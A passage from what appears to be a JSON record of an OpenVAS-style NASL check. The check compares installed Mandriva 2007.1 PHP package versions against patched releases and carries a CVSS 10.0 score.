rpm:\"php~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.1~4.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
